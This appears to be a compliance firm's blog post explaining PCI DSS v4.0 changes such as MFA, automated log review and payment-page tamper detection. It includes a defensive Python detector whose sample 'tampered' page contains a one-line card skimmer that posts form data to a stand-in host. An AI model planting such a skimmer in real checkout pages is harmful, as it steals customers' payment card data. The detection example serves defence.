In the final part of our “Understanding PCI DSS v4.0” series, we tackle the remaining changes in PCI DSS v4.0 that are likely to affect your day-to-day business practices.
Over the course of this series, we have explored a number of changes introduced by PCI DSS v4.0. While not a completely comprehensive evaluation, our goal has been to create a reference that highlights how the move to PCI DSS v4.0 is likely to affect a typical service provider or merchant.
PCI DSS v4.0 Key Changes – Part 3
· Multifactor Authentication for All CDE Access – Multifactor authentication (MFA) is now required for all access into the cardholder data environment (Requirement 8.4.2), not only for non-console administrative access and remote network access as under v3.2.1.
o This requirement is a best practice until March 31, 2025, after which it becomes mandatory.
· Mandatory Automated Log Reviews – Automated mechanisms must be used to perform log reviews (Requirement 10.4.1.1). Your assessor will examine the log review mechanisms and interview personnel to verify that automated tooling, rather than manual inspection alone, is doing the reviewing.
o This requirement is a best practice until March 31, 2025, after which it becomes mandatory.
· Authenticated Internal Scans – The rules for internal vulnerability scans now specifically address authentication (Requirement 11.3.1.2). Authenticated scanning must be performed as follows:
o Any systems that cannot accept credentials for authenticated scanning must be documented.
o The accounts used for authenticated scanning must have sufficient privileges on the systems being scanned.
o If the accounts used for authenticated scanning can also be used for interactive login, they must be managed according to Requirement 8.2.2.
o This requirement is a best practice until March 31, 2025, after which it becomes mandatory.
· Change Detection Mechanism Deployed for Payment Pages – Under Requirement 11.6.1, your organization must deploy a change-and-tamper detection mechanism that alerts personnel to unauthorized modification of the HTTP headers and the contents of payment pages as received by the consumer browser. The mechanism must run at least once every seven days or at the frequency defined in your targeted risk analysis. Because the requirement is about what the browser receives, checks that only inspect the server-side page template will not see a third-party script or CDN resource that has been altered in transit or at its source. The intent is to detect the kind of client-side script injection used in e-commerce skimming attacks.
o This requirement is a best practice until March 31, 2025, after which it becomes mandatory.
· Allowance for In Place with Remediation – This is a new category added to the possible dispositions for each requirement. Receiving this disposition means that at some point during the PCI DSS assessment period the control failed validation testing but was remediated and back in place before the end of the assessment.
o For an In Place with Remediation finding, the assessor will need assurance that the entity has addressed the root cause of the failure, has fully implemented the control, and has ongoing processes in place to prevent the failure from recurring.
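To make the payment-page change-detection item above concrete, here is an added example (not code from this article, Auditwerx, or the PCI SSC) showing the core of such a mechanism: fingerprint a known-good capture of the page as the browser receives it (selected response headers, the inventory of external script URLs, and hashes of inline scripts), then compare a later capture against it and raise alerts for anything that changed. It assumes you already have a way to capture headers and body from the consumer's vantage point (for example a headless browser run from outside your network); the two page captures below are constructed samples, and the domains in them are hypothetical.

```python
import hashlib
from html.parser import HTMLParser

# Constructed sample captures (headers + body as a browser would receive them).
# Hostnames are hypothetical; this is not data from any real site.
BASELINE = {
    "headers": {
        "Content-Security-Policy": "script-src 'self' https://js.example-psp.com",
        "Content-Type": "text/html; charset=utf-8",
    },
    "body": """<html><head><title>Checkout</title>
<script src="https://js.example-psp.com/v3/checkout.js"></script>
</head><body><form id="card"><input name="pan"></form></body></html>""",
}

# Same page after a skimmer has been injected: a new inline script exfiltrates
# the form, and the CSP has been loosened to allow the exfiltration host.
TAMPERED = {
    "headers": {
        "Content-Security-Policy": "script-src 'self' https://js.example-psp.com https://cdn.evil-skim.example",
        "Content-Type": "text/html; charset=utf-8",
    },
    "body": """<html><head><title>Checkout</title>
<script src="https://js.example-psp.com/v3/checkout.js"></script>
<script>document.forms.card.onsubmit=function(){fetch('https://cdn.evil-skim.example/c',{method:'POST',body:new FormData(this)})}</script>
</head><body><form id="card"><input name="pan"></form></body></html>""",
}

# Headers whose change on a payment page should always be alerted on.
WATCHED_HEADERS = ("Content-Security-Policy", "Content-Type")


class ScriptCollector(HTMLParser):
    """Collects external script URLs and SHA-256 hashes of inline scripts."""

    def __init__(self):
        super().__init__()
        self.external = []
        self.inline = []
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.external.append(src)
            else:
                self._in_script = True
                self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            text = "".join(self._buf).strip()
            self.inline.append(hashlib.sha256(text.encode()).hexdigest())


def fingerprint(page):
    """Reduce a capture to the attributes we compare between runs."""
    p = ScriptCollector()
    p.feed(page["body"])
    return {
        "headers": {h: page["headers"].get(h) for h in WATCHED_HEADERS},
        "external_scripts": sorted(set(p.external)),
        "inline_script_hashes": sorted(set(p.inline)),
        "body_sha256": hashlib.sha256(page["body"].encode()).hexdigest(),
    }


def diff_fingerprints(baseline, current):
    """Return a list of human-readable alerts; empty list means no change."""
    alerts = []
    for h in WATCHED_HEADERS:
        if baseline["headers"][h] != current["headers"][h]:
            alerts.append(f"header changed: {h}: {baseline['headers'][h]!r} -> {current['headers'][h]!r}")
    for url in set(current["external_scripts"]) - set(baseline["external_scripts"]):
        alerts.append(f"new external script: {url}")
    for url in set(baseline["external_scripts"]) - set(current["external_scripts"]):
        alerts.append(f"external script removed: {url}")
    for h in set(current["inline_script_hashes"]) - set(baseline["inline_script_hashes"]):
        alerts.append(f"new/modified inline script (sha256 {h[:16]}...)")
    # Any other change to the body (markup, form fields) still deserves review.
    if not alerts and baseline["body_sha256"] != current["body_sha256"]:
        alerts.append("page body changed outside script/header inventory (review)")
    return alerts


def check_payment_page(baseline_page, current_page):
    return diff_fingerprints(fingerprint(baseline_page), fingerprint(current_page))


if __name__ == "__main__":
    for alert in check_payment_page(BASELINE, TAMPERED):
        print("ALERT:", alert)
```

In practice the baseline is refreshed only through your change-control process, the capture is taken from outside your own network so it sees what a customer sees (including third-party scripts), and each alert is routed to a person who can respond, which is what the assessor will ask to see. Hashing inline scripts rather than diffing raw HTML keeps the comparison stable across harmless dynamic content such as session tokens while still catching an injected script.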
Partner with an Auditwerx QSA
When it comes to changes to the PCI DSS, you aren’t on your own. An Auditwerx QSA can help you understand the specifics behind PCI DSS v4.0 and how it will impact your organization. Contact us today to start your PCI compliance journey.